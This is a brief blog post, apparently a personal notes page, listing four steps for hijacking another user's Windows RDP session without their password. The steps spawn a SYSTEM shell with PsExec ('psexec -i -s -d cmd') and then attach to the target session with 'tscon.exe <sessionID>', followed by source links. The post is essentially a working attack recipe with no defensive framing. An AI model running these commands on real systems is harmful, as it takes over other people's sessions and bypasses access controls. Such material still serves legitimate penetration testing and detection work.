Wednesday, June 13, 2018

RDP session hijacking (without password / as administrator)

  1. Get session ID of the session you want to connect to
  2. Get PsExec
  3. Run CMD under System account from admin CMD: psexec -i -s -d cmd
  4. Run tscon.exe <sessionID>
 Sources:
  1.  PsExec
  2. Getting a CMD prompt as SYSTEM in Windows Vista and Windows Server 2008 
  3. RDP hijacking — how to hijack RDS... 

No comments:

Post a Comment